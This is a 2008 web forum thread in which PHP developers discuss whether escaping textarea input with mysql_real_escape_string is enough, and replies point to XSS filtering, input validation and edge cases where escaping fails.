Page 1 of 1

Securing input in a textarea (forum)

Posted: Sun Aug 03, 2008 11:34 pm
by Demiloy
Right now I'm making a forum (not so much to try to challenge phpBB or anything like that, but to gain experience). So, when someone posts a new topic or post, I run it throught mysql_real_escape_string, and then put it straight into the MySQL database. But I'm wondering, is there any other potentially harmful thing an attacker could do, even after escaping the string?

Re: Securing input in a textarea (forum)

Posted: Mon Aug 04, 2008 1:43 am
by jaoudestudios
That should be fine, make sure you use it on all php variables in the query.

Re: Securing input in a textarea (forum)

Posted: Mon Aug 04, 2008 4:38 am
by jaoudestudios

Re: Securing input in a textarea (forum)

Posted: Tue Aug 05, 2008 10:44 am
by alex.barylski
Define potentially harmful...that is very subjective and if I said NO someone would likely counter argue, so I'll say maybe. :P

If you properly escape the incoming data...it will prevent anyone from executing a SQLi attack but that is about it.

You do not mention anything about filtering so that might be exploited for XSS.

Validation is another link in the security chain.

Whether you consider any of the number of exploits or problems actually problems or just minor setbacks is really sujective.

Personally I don't filter *everything* for example an email address. I do however have a sophisticated RFC validation routine I run against email input and if it fails it's only because the email isn't valid according to RFC, so in this case filtering would be redundant.

A message post on the other hand...is probably very difficult to validate (given the arbitrary nature of user text) so you are probably better off filtering and removing harmful tags, attributes, etc.

Re: Securing input in a textarea (forum)

Posted: Fri Aug 08, 2008 4:43 am
by Mordred
There are cases, when escaping is not enough: http://www.logris.org/security/the-unex ... -injection
Don't forget to pay attention to the other code in the forum: searching and sorting in particular open possibilities for failures like the ones described in the above paper.